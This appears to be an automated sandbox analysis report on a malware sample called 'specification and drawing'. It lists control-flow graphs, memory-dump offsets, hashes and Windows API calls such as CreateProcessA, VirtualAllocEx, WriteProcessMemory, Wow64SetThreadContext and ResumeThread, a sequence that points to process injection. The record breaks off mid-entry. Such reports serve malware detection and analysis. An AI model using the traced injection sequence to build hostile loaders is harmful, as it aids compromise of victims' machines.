                                                                                                          control_flow_graph 45 71d9bbc-71d9c5d 47 71d9c5f-71d9c69 45->47 48 71d9c96-71d9cb6 45->48 47->48 49 71d9c6b-71d9c6d 47->49 53 71d9cef-71d9d1e 48->53 54 71d9cb8-71d9cc2 48->54 51 71d9c6f-71d9c79 49->51 52 71d9c90-71d9c93 49->52 55 71d9c7d-71d9c8c 51->55 56 71d9c7b 51->56 52->48 64 71d9d57-71d9e11 CreateProcessA 53->64 65 71d9d20-71d9d2a 53->65 54->53 57 71d9cc4-71d9cc6 54->57 55->55 58 71d9c8e 55->58 56->55 59 71d9ce9-71d9cec 57->59 60 71d9cc8-71d9cd2 57->60 58->52 59->53 62 71d9cd4 60->62 63 71d9cd6-71d9ce5 60->63 62->63 63->63 66 71d9ce7 63->66 76 71d9e1a-71d9ea0 64->76 77 71d9e13-71d9e19 64->77 65->64 67 71d9d2c-71d9d2e 65->67 66->59 69 71d9d51-71d9d54 67->69 70 71d9d30-71d9d3a 67->70 69->64 71 71d9d3c 70->71 72 71d9d3e-71d9d4d 70->72 71->72 72->72 73 71d9d4f 72->73 73->69 87 71d9eb0-71d9eb4 76->87 88 71d9ea2-71d9ea6 76->88 77->76 90 71d9ec4-71d9ec8 87->90 91 71d9eb6-71d9eba 87->91 88->87 89 71d9ea8 88->89 89->87 93 71d9ed8-71d9edc 90->93 94 71d9eca-71d9ece 90->94 91->90 92 71d9ebc 91->92 92->90 95 71d9eee-71d9ef5 93->95 96 71d9ede-71d9ee4 93->96 94->93 97 71d9ed0 94->97 98 71d9f0c 95->98 99 71d9ef7-71d9f06 95->99 96->95 97->93 101 71d9f0d 98->101 99->98 101->101
                                                                                                          APIs
                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071D9DFE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 963392458-0
                                                                                                          • Opcode ID: 1c06b5580f94b3aaa96a5d1d4ad66d8e52ce9a571feb041b9fc4d7552d28a694
                                                                                                          • Instruction ID: 2cdcf4cc4f8bd27c3f599cd9ef02ee5ed875f894f8eeedc84f4d0ff23b3d358b
                                                                                                          • Opcode Fuzzy Hash: 1c06b5580f94b3aaa96a5d1d4ad66d8e52ce9a571feb041b9fc4d7552d28a694
                                                                                                          • Instruction Fuzzy Hash: D4914BB1D0061ADFEF11CF68C9417DDBBB2FB48314F148569D809A7280DB74A985CF91

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 102 71d9bc8-71d9c5d 104 71d9c5f-71d9c69 102->104 105 71d9c96-71d9cb6 102->105 104->105 106 71d9c6b-71d9c6d 104->106 110 71d9cef-71d9d1e 105->110 111 71d9cb8-71d9cc2 105->111 108 71d9c6f-71d9c79 106->108 109 71d9c90-71d9c93 106->109 112 71d9c7d-71d9c8c 108->112 113 71d9c7b 108->113 109->105 121 71d9d57-71d9e11 CreateProcessA 110->121 122 71d9d20-71d9d2a 110->122 111->110 114 71d9cc4-71d9cc6 111->114 112->112 115 71d9c8e 112->115 113->112 116 71d9ce9-71d9cec 114->116 117 71d9cc8-71d9cd2 114->117 115->109 116->110 119 71d9cd4 117->119 120 71d9cd6-71d9ce5 117->120 119->120 120->120 123 71d9ce7 120->123 133 71d9e1a-71d9ea0 121->133 134 71d9e13-71d9e19 121->134 122->121 124 71d9d2c-71d9d2e 122->124 123->116 126 71d9d51-71d9d54 124->126 127 71d9d30-71d9d3a 124->127 126->121 128 71d9d3c 127->128 129 71d9d3e-71d9d4d 127->129 128->129 129->129 130 71d9d4f 129->130 130->126 144 71d9eb0-71d9eb4 133->144 145 71d9ea2-71d9ea6 133->145 134->133 147 71d9ec4-71d9ec8 144->147 148 71d9eb6-71d9eba 144->148 145->144 146 71d9ea8 145->146 146->144 150 71d9ed8-71d9edc 147->150 151 71d9eca-71d9ece 147->151 148->147 149 71d9ebc 148->149 149->147 152 71d9eee-71d9ef5 150->152 153 71d9ede-71d9ee4 150->153 151->150 154 71d9ed0 151->154 155 71d9f0c 152->155 156 71d9ef7-71d9f06 152->156 153->152 154->150 158 71d9f0d 155->158 156->155 158->158
                                                                                                          APIs
                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071D9DFE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 963392458-0
                                                                                                          • Opcode ID: d3f993552ab4c901b8b7da44b7482a1869d64f5281ef222935811ce3c31db189
                                                                                                          • Instruction ID: e61d0667b312fe27f6cf0c97c873bef3042453d1e3d474ed61d6aaf867714f30
                                                                                                          • Opcode Fuzzy Hash: d3f993552ab4c901b8b7da44b7482a1869d64f5281ef222935811ce3c31db189
                                                                                                          • Instruction Fuzzy Hash: BE914AB1D0061ADFEF21CF68C8457DDBBB2FB48314F1485A9E809A7280DB74A985CF91

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 159 13eb2b7-13eb2d7 160 13eb2d9-13eb2e6 call 13e9d40 159->160 161 13eb303-13eb307 159->161 168 13eb2fc 160->168 169 13eb2e8 160->169 162 13eb31b-13eb35c 161->162 163 13eb309-13eb313 161->163 170 13eb35e-13eb366 162->170 171 13eb369-13eb377 162->171 163->162 168->161 217 13eb2ee call 13eb560 169->217 218 13eb2ee call 13eb550 169->218 170->171 172 13eb39b-13eb39d 171->172 173 13eb379-13eb37e 171->173 175 13eb3a0-13eb3a7 172->175 176 13eb389 173->176 177 13eb380-13eb387 call 13eaf58 173->177 174 13eb2f4-13eb2f6 174->168 178 13eb438-13eb4f8 174->178 179 13eb3a9-13eb3b1 175->179 180 13eb3b4-13eb3bb 175->180 182 13eb38b-13eb399 176->182 177->182 210 13eb4fa-13eb4fd 178->210 211 13eb500-13eb52b GetModuleHandleW 178->211 179->180 183 13eb3bd-13eb3c5 180->183 184 13eb3c8-13eb3d1 call 13eaf68 180->184 182->175 183->184 190 13eb3de-13eb3e3 184->190 191 13eb3d3-13eb3db 184->191 192 13eb3e5-13eb3ec 190->192 193 13eb401-13eb405 190->193 191->190 192->193 195 13eb3ee-13eb3fe call 13eaf78 call 13eaf88 192->195 215 13eb408 call 13eb833 193->215 216 13eb408 call 13eb860 193->216 195->193 196 13eb40b-13eb40e 199 13eb410-13eb42e 196->199 200 13eb431-13eb437 196->200 199->200 210->211 212 13eb52d-13eb533 211->212 213 13eb534-13eb548 211->213 212->213 215->196 216->196 217->174 218->174
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 013EB51E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleModule
                                                                                                          • String ID:
                                                                                                          • API String ID: 4139908857-0
                                                                                                          • Opcode ID: 03a7b192c93112260a7f6f62459257ac9d299338e594e8db29c864556f5e89a6
                                                                                                          • Instruction ID: 3d308fd7bb67674d2f7230a5a88cb6ffcedcf0709746a406f2808de340362fd4
                                                                                                          • Opcode Fuzzy Hash: 03a7b192c93112260a7f6f62459257ac9d299338e594e8db29c864556f5e89a6
                                                                                                          • Instruction Fuzzy Hash: B6816570A00B158FD725DF29D44975ABBF1FF88308F008A2DD486D7A94DB74E849CB91

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 219 13e4544-13e5e99 CreateActCtxA 222 13e5e9b-13e5ea1 219->222 223 13e5ea2-13e5efc 219->223 222->223 230 13e5efe-13e5f01 223->230 231 13e5f0b-13e5f0f 223->231 230->231 232 13e5f20 231->232 233 13e5f11-13e5f1d 231->233 234 13e5f21 232->234 233->232 234->234
                                                                                                          APIs
                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 013E5E89
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Create
                                                                                                          • String ID:
                                                                                                          • API String ID: 2289755597-0
                                                                                                          • Opcode ID: 89fc2a9e5d6b2a2f8689efe969454bad6a7b9a0447799825e5d0c21b00ad2f30
                                                                                                          • Instruction ID: b58cfb62e3e292e2b5bad410f0da142ecad17a1f6147881f088986eb6217568d
                                                                                                          • Opcode Fuzzy Hash: 89fc2a9e5d6b2a2f8689efe969454bad6a7b9a0447799825e5d0c21b00ad2f30
                                                                                                          • Instruction Fuzzy Hash: CB41E375C0072DCBDB24CFA9C94478EBBF5BF84708F20805AD508AB251DB756949CF91

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 236 13e5dcc-13e5e99 CreateActCtxA 238 13e5e9b-13e5ea1 236->238 239 13e5ea2-13e5efc 236->239 238->239 246 13e5efe-13e5f01 239->246 247 13e5f0b-13e5f0f 239->247 246->247 248 13e5f20 247->248 249 13e5f11-13e5f1d 247->249 250 13e5f21 248->250 249->248 250->250
                                                                                                          APIs
                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 013E5E89
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Create
                                                                                                          • String ID:
                                                                                                          • API String ID: 2289755597-0
                                                                                                          • Opcode ID: 5b307cb4f0ee29d6f2ee11ce9c816226a6be1410e36de3a34d97b171726c873a
                                                                                                          • Instruction ID: 590f8996533595de27d54ab424afe5cd05dd8419153c481a8d40a54e2f8860a9
                                                                                                          • Opcode Fuzzy Hash: 5b307cb4f0ee29d6f2ee11ce9c816226a6be1410e36de3a34d97b171726c873a
                                                                                                          • Instruction Fuzzy Hash: C141EFB5C00729CEDB24CFA9C9447CDBBF5BF88708F20846AD508AB291DB75594ACF91

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 252 7c57668-7c5767a 253 7c57682-7c5768d 252->253 254 7c5767d call 7c5420c 252->254 255 7c576a2-7c57734 CreateIconFromResourceEx 253->255 256 7c5768f-7c5769f 253->256 254->253 260 7c57736-7c5773c 255->260 261 7c5773d-7c5775a 255->261 260->261
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFromIconResource
                                                                                                          • String ID:
                                                                                                          • API String ID: 3668623891-0
                                                                                                          • Opcode ID: a4ed80e9da32c0b120d62f8f35ab90195b2e8752ebbd0eff1d09c4b7be6d700b
                                                                                                          • Instruction ID: 9f279ed4825ac6702e83eeb88537b77c7f42c81cd8a36c5ed97a768938a42b03
                                                                                                          • Opcode Fuzzy Hash: a4ed80e9da32c0b120d62f8f35ab90195b2e8752ebbd0eff1d09c4b7be6d700b
                                                                                                          • Instruction Fuzzy Hash: 273189B2900359AFCB01CFAAD840ADEBFF8EF49310F14805AE954A7261C3359994CFA1

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 264 7c5419c-7c56864 266 7c56866-7c5686c 264->266 267 7c5686f-7c5687e 264->267 266->267 268 7c56880 267->268 269 7c56883-7c568bc DrawTextExW 267->269 268->269 270 7c568c5-7c568e2 269->270 271 7c568be-7c568c4 269->271 271->270
                                                                                                          APIs
                                                                                                          • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07C567FD,?,?), ref: 07C568AF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DrawText
                                                                                                          • String ID:
                                                                                                          • API String ID: 2175133113-0
                                                                                                          • Opcode ID: a515f0287402845fc14ad96e46a33261d05c86b717da230757b1fcacd8559d2a
                                                                                                          • Instruction ID: 15f04020ae0964515f40cfeb8ad58e43c663c170776132a7472e232d9badc5ad
                                                                                                          • Opcode Fuzzy Hash: a515f0287402845fc14ad96e46a33261d05c86b717da230757b1fcacd8559d2a
                                                                                                          • Instruction Fuzzy Hash: 623100B5D0020ADFDB10CF9AD884A9EBBF5FB48720F54842AE918A7310D775A944CFA4

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 274 71d9939-71d998e 277 71d999e-71d99dd WriteProcessMemory 274->277 278 71d9990-71d999c 274->278 280 71d99df-71d99e5 277->280 281 71d99e6-71d9a16 277->281 278->277 280->281
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071D99D0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: 67409cc725184cf71c1279dd8449b26d8d850f2407abf0054e06b624986b6ec3
                                                                                                          • Instruction ID: d92c3f4724175e175b080d3de8085f849774d58120720c2ca006c05b4c489b6e
                                                                                                          • Opcode Fuzzy Hash: 67409cc725184cf71c1279dd8449b26d8d850f2407abf0054e06b624986b6ec3
                                                                                                          • Instruction Fuzzy Hash: 1C2128B69003599FDB10CFA9C881BDEBBF5FF48314F10842AE558A7240D778A954CFA5

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 285 7c56810-7c56864 287 7c56866-7c5686c 285->287 288 7c5686f-7c5687e 285->288 287->288 289 7c56880 288->289 290 7c56883-7c568bc DrawTextExW 288->290 289->290 291 7c568c5-7c568e2 290->291 292 7c568be-7c568c4 290->292 292->291
                                                                                                          APIs
                                                                                                          • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07C567FD,?,?), ref: 07C568AF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DrawText
                                                                                                          • String ID:
                                                                                                          • API String ID: 2175133113-0
                                                                                                          • Opcode ID: b67823973d863c76c6e0b9a50e642d0ad9492e0e6693bd2dce7889955c329ffe
                                                                                                          • Instruction ID: 063539300a0804c92bae93c729044c4a0d804fe94128eb7ccd109b9f6a4fefed
                                                                                                          • Opcode Fuzzy Hash: b67823973d863c76c6e0b9a50e642d0ad9492e0e6693bd2dce7889955c329ffe
                                                                                                          • Instruction Fuzzy Hash: 9831D1B5D0020A9FDB10CF9AD8846DEBBF5BB48320F14842AE918A7210D775A954CFA4

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 295 71d9940-71d998e 297 71d999e-71d99dd WriteProcessMemory 295->297 298 71d9990-71d999c 295->298 300 71d99df-71d99e5 297->300 301 71d99e6-71d9a16 297->301 298->297 300->301
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071D99D0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: 43a68ef80ffc2b7a9d12866212122819f969bc9e6c182801e0c7eef52b6953af
                                                                                                          • Instruction ID: 63b67099be3c62ef65fb0bc6ed464e75a164f1f6a9832b48197a8f3507196abf
                                                                                                          • Opcode Fuzzy Hash: 43a68ef80ffc2b7a9d12866212122819f969bc9e6c182801e0c7eef52b6953af
                                                                                                          • Instruction Fuzzy Hash: 3F2128B59003499FDB10CFA9C881BDEBBF5FF48310F108429E558A7240C778A954CBA5

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 305 71d9368-71d93bb 308 71d93bd-71d93c9 305->308 309 71d93cb-71d93fb Wow64SetThreadContext 305->309 308->309 311 71d93fd-71d9403 309->311 312 71d9404-71d9434 309->312 311->312
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071D93EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: a34903b83c34d7e260b1633f6a9ed23fcba814d8ae52ceed7c5cd8304d18115b
                                                                                                          • Instruction ID: c05a1f7f7ab8152b76c8bcb5767b4276a26ea3cc1656e45a0c227697540223af
                                                                                                          • Opcode Fuzzy Hash: a34903b83c34d7e260b1633f6a9ed23fcba814d8ae52ceed7c5cd8304d18115b
                                                                                                          • Instruction Fuzzy Hash: DC217CB19003099FDB10CFAAC5857EEBBF4EF48324F148429D559A7281CB78A944CFA1

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 316 71d9a29-71d9abd ReadProcessMemory 320 71d9abf-71d9ac5 316->320 321 71d9ac6-71d9af6 316->321 320->321
                                                                                                          APIs
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071D9AB0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 1726664587-0
                                                                                                          • Opcode ID: d146ca63c699333813f97e6e918e59f3078243e565b1cc7cbd0d2743e4281fcf
                                                                                                          • Instruction ID: abf5758758fa2de66e586b5c306e3f4bd6a23bdf792bf36342f3aa75028e3d6f
                                                                                                          • Opcode Fuzzy Hash: d146ca63c699333813f97e6e918e59f3078243e565b1cc7cbd0d2743e4281fcf
                                                                                                          • Instruction Fuzzy Hash: FF2128B29003499FDF10CFAAC881BDEBBF5FF48710F54842AE558A7240D778A954CBA5

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 325 71d9370-71d93bb 327 71d93bd-71d93c9 325->327 328 71d93cb-71d93fb Wow64SetThreadContext 325->328 327->328 330 71d93fd-71d9403 328->330 331 71d9404-71d9434 328->331 330->331
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071D93EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: fc7258ee57504672c70d288f90a98fb7d2a1e590537f75a4d6f464d53017be50
                                                                                                          • Instruction ID: 9cf0c9fdb79467d72857a9afdd4dce8c34a58ebe571d039d4e9761e1824fefb9
                                                                                                          • Opcode Fuzzy Hash: fc7258ee57504672c70d288f90a98fb7d2a1e590537f75a4d6f464d53017be50
                                                                                                          • Instruction Fuzzy Hash: A4215BB1D003099FDB10CFAAC5857EEBBF4EF88324F148429D559A7281DB78A944CFA5
                                                                                                          APIs
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071D9AB0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 1726664587-0
                                                                                                          • Opcode ID: 48b8452197b002752c43d59bc5a49778febc3ef53d2eba91978227ceac9df62d
                                                                                                          • Instruction ID: d8ba5eddc4990e882ec7eb957495d58e15e3ba5feaee199b46394117b251fa99
                                                                                                          • Opcode Fuzzy Hash: 48b8452197b002752c43d59bc5a49778febc3ef53d2eba91978227ceac9df62d
                                                                                                          • Instruction Fuzzy Hash: 152128B29003499FDB10CFAAC881BDEBBF5FF48710F10842AE558A7240D778A950CBA5
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013ED82F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: 56f520aa13f66538a1387c71df411882b0e5029842a4d979ed85745e043f9da3
                                                                                                          • Instruction ID: 5ec138500b66878b35c1c006436b1fbffac5394cb210e71608fa1508cf139734
                                                                                                          • Opcode Fuzzy Hash: 56f520aa13f66538a1387c71df411882b0e5029842a4d979ed85745e043f9da3
                                                                                                          • Instruction Fuzzy Hash: C221E3B5900209DFDB10CF9AD984ADEBFF4FB48724F14801AE918A3250D378A954CF61
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013ED82F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: 62b14176e0a44f21fb582b130d2404d8ce27784babe43b27fecd482a880c717b
                                                                                                          • Instruction ID: a70a432a0d71ab554b4f37d68e9085af50ab28df3d7efae62fae4d3170382e6d
                                                                                                          • Opcode Fuzzy Hash: 62b14176e0a44f21fb582b130d2404d8ce27784babe43b27fecd482a880c717b
                                                                                                          • Instruction Fuzzy Hash: A021E0B6D00219DFDB10CFAAD984ADEBFF4FB48324F14841AE918A3250D378A954CF60
                                                                                                          APIs
                                                                                                          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07C57682,?,?,?,?,?), ref: 07C57727
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFromIconResource
                                                                                                          • String ID:
                                                                                                          • API String ID: 3668623891-0
                                                                                                          • Opcode ID: 8c7ac8a9dabee8edfbacf3283dc665ff4e6869c3ed877eb2a4fd60fff830d38e
                                                                                                          • Instruction ID: 5c7abe94db34d4a705d2f7a2076b5eaa84940342634f061a2716f1c4ab6aba35
                                                                                                          • Opcode Fuzzy Hash: 8c7ac8a9dabee8edfbacf3283dc665ff4e6869c3ed877eb2a4fd60fff830d38e
                                                                                                          • Instruction Fuzzy Hash: CB113AB5800349DFDB10CF9AD844BDEBFF8EB48720F14841AE954A7250C775A994CFA5
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071D98EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 9b2635d30a349baddbefd1f7db5a51581f34626b9e9040b9628edb96fc1ee58b
                                                                                                          • Instruction ID: 200b85d84aaa3f200a1b861ba8fd98956168693dd7cf297b71dab8e54cad4887
                                                                                                          • Opcode Fuzzy Hash: 9b2635d30a349baddbefd1f7db5a51581f34626b9e9040b9628edb96fc1ee58b
                                                                                                          • Instruction Fuzzy Hash: F61159B29003499FDB10CFAAC845BDEBBF5EF88724F148419E519A7250C775A950CFA1
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071D98EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 39e5bed800a3dbfbf54b7355eb794ee861a05e552346c4aa5d8029bd9039d86b
                                                                                                          • Instruction ID: 0ada0147684da6b96d0d13417dc3d704feb24f5b774371bdf361eba85b96ee9a
                                                                                                          • Opcode Fuzzy Hash: 39e5bed800a3dbfbf54b7355eb794ee861a05e552346c4aa5d8029bd9039d86b
                                                                                                          • Instruction Fuzzy Hash: 691156B29003499FDB10CFAAC845BDEBBF5EF88724F108419E519A7250C775A910CFA1
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          • Opcode ID: 02793ab0d5d6eca861df01a286fb85ddba2fdab7517d18ec7d739b0965f71ba7
                                                                                                          • Instruction ID: a14b82942cb320248180845a6ab310362f50f4e986f33f20c249306587113fc2
                                                                                                          • Opcode Fuzzy Hash: 02793ab0d5d6eca861df01a286fb85ddba2fdab7517d18ec7d739b0965f71ba7
                                                                                                          • Instruction Fuzzy Hash: 5B1158B19003498FDB20DFAAC8457DEFBF4EF88624F248419D519A7240CB79A944CFA5
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
